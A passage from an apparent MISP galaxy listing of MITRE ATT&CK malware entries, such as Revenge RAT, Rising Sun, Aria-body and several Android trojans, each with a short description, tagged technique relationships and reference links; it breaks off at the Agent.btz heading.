uses: misp-galaxy:mitre-attack-pattern="System Shutdown/Reboot - T1529" with estimative-language:likelihood-probability="almost-certain"

Table 4625. Table References
Links
https://attack.mitre.org/software/S0365
https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
https://www.justice.gov/opa/press-release/file/1328521/download

Revenge RAT - S0379

[Revenge RAT](https://attack.mitre.org/software/S0379) is a freely available remote access tool written in .NET (C#).(Citation: Cylance Shaheen Nov 2018)(Citation: Cofense RevengeRAT Feb 2019)

The tag is: misp-galaxy:mitre-malware="Revenge RAT - S0379"

Revenge RAT - S0379 is also known as:

Revenge RAT

View relationships graph

Revenge RAT - S0379 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Video Capture - T1125" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Audio Capture - T1123" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1065" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Mshta - T1218.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bidirectional Communication - T1102.002" with estimative-language:likelihood-probability="almost-certain"

Table 4626. Table References
Links
https://attack.mitre.org/software/S0379
https://www.cylance.com/content/dam/cylance-web/en-us/resources/knowledge-center/resource-library/reports/WhiteCompanyOperationShaheenReport.pdf?_ga=2.161661948.1943296560.1555683782-1066572390.1555511517
https://cofense.com/upgrades-delivery-support-infrastructure-revenge-rat-malware-bigger-threat/

Rising Sun - S0448

[Rising Sun](https://attack.mitre.org/software/S0448) is a modular backdoor malware used extensively in Operation [Sharpshooter](https://attack.mitre.org/groups/G0104). The malware has been observed targeting nuclear, defense, energy, and financial services companies across the world. [Rising Sun](https://attack.mitre.org/software/S0448) uses source code from [Lazarus Group](https://attack.mitre.org/groups/G0032)'s Trojan Duuzer.(Citation: McAfee Sharpshooter December 2018)

The tag is: misp-galaxy:mitre-malware="Rising Sun - S0448"

Rising Sun - S0448 is also known as:

Rising Sun

View relationships graph

Rising Sun - S0448 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Indicator Removal on Host - T1070" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Custom Method - T1560.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

Table 4627. Table References
Links
https://attack.mitre.org/software/S0448
https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf

JSS Loader - S0648

[JSS Loader](https://attack.mitre.org/software/S0648) is Remote Access Trojan (RAT) with .NET and C++ variants that has been used by [FIN7](https://attack.mitre.org/groups/G0046) since at least 2020.(Citation: eSentire FIN7 July 2021)(Citation: CrowdStrike Carbon Spider August 2021)

The tag is: misp-galaxy:mitre-malware="JSS Loader - S0648"

JSS Loader - S0648 is also known as:

JSS Loader

View relationships graph

JSS Loader - S0648 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"

Table 4628. Table References
Links
https://attack.mitre.org/software/S0648
https://www.esentire.com/security-advisories/notorious-cybercrime-gang-fin7-lands-malware-in-law-firm-using-fake-legal-complaint-against-jack-daniels-owner-brown-forman-inc
https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/

DEFENSOR ID - S0479

[DEFENSOR ID](https://attack.mitre.org/software/S0479) is a banking trojan capable of clearing a victim’s bank account or cryptocurrency wallet and taking over email or social media accounts. [DEFENSOR ID](https://attack.mitre.org/software/S0479) performs the majority of its malicious functionality by abusing Android’s accessibility service.(Citation: ESET DEFENSOR ID)

The tag is: misp-galaxy:mitre-malware="DEFENSOR ID - S0479"

DEFENSOR ID - S0479 is also known as:

DEFENSOR ID

View relationships graph

DEFENSOR ID - S0479 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Authorized App Store - T1475" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1513" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Input Injection - T1516" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Discovery - T1418" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Broadcast Receivers - T1402" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Application Layer Protocol - T1437" with estimative-language:likelihood-probability="almost-certain"

Table 4629. Table References
Links
https://attack.mitre.org/software/S0479
https://www.welivesecurity.com/2020/05/22/insidious-android-malware-gives-up-all-malicious-features-but-one-gain-stealth/

Tiktok Pro - S0558

[Tiktok Pro](https://attack.mitre.org/software/S0558) is spyware that has been masquerading as the TikTok application.(Citation: Zscaler TikTok Spyware)

The tag is: misp-galaxy:mitre-malware="Tiktok Pro - S0558"

Tiktok Pro - S0558 is also known as:

Tiktok Pro

View relationships graph

Tiktok Pro - S0558 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Other Means - T1476" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture Camera - T1512" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture Audio - T1429" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Suppress Application Icon - T1508" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerade as Legitimate Application - T1444" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Foreground Persistence - T1541" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Input Prompt - T1411" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1513" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Broadcast Receivers - T1402" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Discovery - T1418" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Call Log - T1433" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Delete Device Data - T1447" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SMS Control - T1582" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1420" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task/Job - T1603" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1533" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Command-Line Interface - T1605" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Contact List - T1432" with estimative-language:likelihood-probability="almost-certain"

Table 4630. Table References
Links
https://attack.mitre.org/software/S0558
https://www.zscaler.com/blogs/security-research/tiktok-spyware

Trojan-SMS.AndroidOS.FakeInst.a - S0306

[Trojan-SMS.AndroidOS.FakeInst.a](https://attack.mitre.org/software/S0306) is Android malware. (Citation: Kaspersky-MobileMalware)

The tag is: misp-galaxy:mitre-malware="Trojan-SMS.AndroidOS.FakeInst.a - S0306"

Trojan-SMS.AndroidOS.FakeInst.a - S0306 is also known as:

Trojan-SMS.AndroidOS.FakeInst.a

View relationships graph

Trojan-SMS.AndroidOS.FakeInst.a - S0306 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Standard Application Layer Protocol - T1437" with estimative-language:likelihood-probability="almost-certain"

Table 4631. Table References
Links
https://attack.mitre.org/software/S0306
https://securelist.com/mobile-malware-evolution-2013/58335/

Trojan-SMS.AndroidOS.Agent.ao - S0307

[Trojan-SMS.AndroidOS.Agent.ao](https://attack.mitre.org/software/S0307) is Android malware. (Citation: Kaspersky-MobileMalware)

The tag is: misp-galaxy:mitre-malware="Trojan-SMS.AndroidOS.Agent.ao - S0307"

Trojan-SMS.AndroidOS.Agent.ao - S0307 is also known as:

Trojan-SMS.AndroidOS.Agent.ao

View relationships graph

Trojan-SMS.AndroidOS.Agent.ao - S0307 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Standard Application Layer Protocol - T1437" with estimative-language:likelihood-probability="almost-certain"

Table 4632. Table References
Links
https://attack.mitre.org/software/S0307
https://securelist.com/mobile-malware-evolution-2013/58335/

Trojan-SMS.AndroidOS.OpFake.a - S0308

[Trojan-SMS.AndroidOS.OpFake.a](https://attack.mitre.org/software/S0308) is Android malware. (Citation: Kaspersky-MobileMalware)

The tag is: misp-galaxy:mitre-malware="Trojan-SMS.AndroidOS.OpFake.a - S0308"

Trojan-SMS.AndroidOS.OpFake.a - S0308 is also known as:

Trojan-SMS.AndroidOS.OpFake.a

View relationships graph

Trojan-SMS.AndroidOS.OpFake.a - S0308 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Standard Application Layer Protocol - T1437" with estimative-language:likelihood-probability="almost-certain"

Table 4633. Table References
Links
https://attack.mitre.org/software/S0308
https://securelist.com/mobile-malware-evolution-2013/58335/

Mis-Type - S0084

[Mis-Type](https://attack.mitre.org/software/S0084) is a backdoor hybrid that was used by [Dust Storm](https://attack.mitre.org/groups/G0031) in 2012. (Citation: Cylance Dust Storm)

The tag is: misp-galaxy:mitre-malware="Mis-Type - S0084"

Mis-Type - S0084 is also known as:

Mis-Type

View relationships graph

Mis-Type - S0084 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Account - T1136.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Custom Command and Control Protocol - T1094" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

Table 4634. Table References
Links
https://attack.mitre.org/software/S0084
https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdf

S-Type - S0085

[S-Type](https://attack.mitre.org/software/S0085) is a backdoor that was used by [Dust Storm](https://attack.mitre.org/groups/G0031) from 2013 to 2014. (Citation: Cylance Dust Storm)

The tag is: misp-galaxy:mitre-malware="S-Type - S0085"

S-Type - S0085 is also known as:

S-Type

View relationships graph

S-Type - S0085 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1547.009" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Account - T1136.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"

Table 4635. Table References
Links
https://attack.mitre.org/software/S0085
https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdf

Hi-Zor - S0087

[Hi-Zor](https://attack.mitre.org/software/S0087) is a remote access tool (RAT) that has characteristics similar to [Sakula](https://attack.mitre.org/software/S0074). It was used in a campaign named INOCNATION. (Citation: Fidelis Hi-Zor)

The tag is: misp-galaxy:mitre-malware="Hi-Zor - S0087"

Hi-Zor - S0087 is also known as:

Hi-Zor

View relationships graph

Hi-Zor - S0087 has relationships with:

similar: misp-galaxy:rat="Hi-Zor" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"

Table 4636. Table References
Links
https://attack.mitre.org/software/S0087
https://www.fidelissecurity.com/threatgeek/archive/introducing-hi-zor-rat/

Miner-C - S0133

[Miner-C](https://attack.mitre.org/software/S0133) is malware that mines victims for the Monero cryptocurrency. It has targeted FTP servers and Network Attached Storage (NAS) devices to spread. (Citation: Softpedia MinerC)

The tag is: misp-galaxy:mitre-malware="Miner-C - S0133"

Miner-C - S0133 is also known as:

Miner-C
Mal/Miner-C
PhotoMiner

View relationships graph

Miner-C - S0133 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Taint Shared Content - T1080" with estimative-language:likelihood-probability="almost-certain"

Table 4637. Table References
Links
https://attack.mitre.org/software/S0133
http://news.softpedia.com/news/cryptocurrency-mining-malware-discovered-targeting-seagate-nas-hard-drives-508119.shtml

Seth-Locker - S0639

[Seth-Locker](https://attack.mitre.org/software/S0639) is a ransomware with some remote control capabilities that has been in use since at least 2021. (Citation: Trend Micro Ransomware February 2021)

The tag is: misp-galaxy:mitre-malware="Seth-Locker - S0639"

Seth-Locker - S0639 is also known as:

Seth-Locker

View relationships graph

Seth-Locker - S0639 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

Table 4638. Table References
Links
https://attack.mitre.org/software/S0639
https://www.trendmicro.com/en_us/research/21/b/new-in-ransomware.html

Aria-body - S0456

[Aria-body](https://attack.mitre.org/software/S0456) is a custom backdoor that has been used by [Naikon](https://attack.mitre.org/groups/G0019) since approximately 2017.(Citation: CheckPoint Naikon May 2020)

The tag is: misp-galaxy:mitre-malware="Aria-body - S0456"

Aria-body - S0456 is also known as:

Aria-body

View relationships graph

Aria-body - S0456 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Generation Algorithms - T1568.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Removable Media - T1025" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Token Impersonation/Theft - T1134.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Create Process with Token - T1134.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Window Discovery - T1010" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560" with estimative-language:likelihood-probability="almost-certain"

Table 4639. Table References
Links
https://attack.mitre.org/software/S0456
https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/

Android/Chuli.A - S0304

[Android/Chuli.A](https://attack.mitre.org/software/S0304) is Android malware that was delivered to activist groups via a spearphishing email with an attachment. (Citation: Kaspersky-WUC)

The tag is: misp-galaxy:mitre-malware="Android/Chuli.A - S0304"

Android/Chuli.A - S0304 is also known as:

Android/Chuli.A

View relationships graph

Android/Chuli.A - S0304 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Other Means - T1476" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Application Layer Protocol - T1437" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Contact List - T1432" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Alternate Network Mediums - T1438" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Call Log - T1433" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426" with estimative-language:likelihood-probability="almost-certain"

Table 4640. Table References
Links
https://attack.mitre.org/software/S0304
https://securelist.com/android-trojan-found-in-targeted-attack-58/35552/

AndroidOS/MalLocker.B - S0524

[AndroidOS/MalLocker.B](https://attack.mitre.org/software/S0524) is a variant of a ransomware family targeting Android devices. It prevents the user from interacting with the UI by displaying a screen containing a ransom note over all other windows. (Citation: Microsoft MalLockerB)

The tag is: misp-galaxy:mitre-malware="AndroidOS/MalLocker.B - S0524"

AndroidOS/MalLocker.B - S0524 is also known as:

AndroidOS/MalLocker.B

View relationships graph

AndroidOS/MalLocker.B - S0524 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Other Means - T1476" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerade as Legitimate Application - T1444" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Broadcast Receivers - T1402" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Device Lockout - T1446" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406" with estimative-language:likelihood-probability="almost-certain"

Table 4641. Table References
Links
https://attack.mitre.org/software/S0524
https://www.microsoft.com/security/blog/2020/10/08/sophisticated-new-android-malware-marks-the-latest-evolution-of-mobile-ransomware/

Android/AdDisplay.Ashas - S0525

[Android/AdDisplay.Ashas](https://attack.mitre.org/software/S0525) is a variant of adware that has been distributed through multiple apps in the Google Play Store. (Citation: WeLiveSecurity AdDisplayAshas)

The tag is: misp-galaxy:mitre-malware="Android/AdDisplay.Ashas - S0525"

Android/AdDisplay.Ashas - S0525 is also known as:

Android/AdDisplay.Ashas

View relationships graph

Android/AdDisplay.Ashas - S0525 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Authorized App Store - T1475" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerade as Legitimate Application - T1444" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Discovery - T1418" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Broadcast Receivers - T1402" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Suppress Application Icon - T1508" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Evade Analysis Environment - T1523" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Application Layer Protocol - T1437" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Generate Fraudulent Advertising Revenue - T1472" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406" with estimative-language:likelihood-probability="almost-certain"

Table 4642. Table References
Links
https://attack.mitre.org/software/S0525
https://www.welivesecurity.com/2019/10/24/tracking-down-developer-android-adware/

Trojan.Mebromi - S0001

[Trojan.Mebromi](https://attack.mitre.org/software/S0001) is BIOS-level malware that takes control of the victim before MBR. (Citation: Ge 2011)

The tag is: misp-galaxy:mitre-malware="Trojan.Mebromi - S0001"

Trojan.Mebromi - S0001 is also known as:

Trojan.Mebromi

View relationships graph

Trojan.Mebromi - S0001 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="System Firmware - T1019" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Firmware - T1542.001" with estimative-language:likelihood-probability="almost-certain"

Table 4643. Table References
Links
https://attack.mitre.org/software/S0001
http://www.symantec.com/connect/blogs/bios-threat-showing-again

ANDROIDOS_ANSERVER.A - S0310

[ANDROIDOS_ANSERVER.A](https://attack.mitre.org/software/S0310) is Android malware that is unique because it uses encrypted content within a blog site for command and control. (Citation: TrendMicro-Anserver)

The tag is: misp-galaxy:mitre-malware="ANDROIDOS_ANSERVER.A - S0310"

ANDROIDOS_ANSERVER.A - S0310 is also known as:

ANDROIDOS_ANSERVER.A

View relationships graph

ANDROIDOS_ANSERVER.A - S0310 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1422" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Service - T1481" with estimative-language:likelihood-probability="almost-certain"

Table 4644. Table References
Links
https://attack.mitre.org/software/S0310
http://blog.trendmicro.com/trendlabs-security-intelligence/android-malware-uses-blog-posts-as-cc/

Agent.btz - S0092

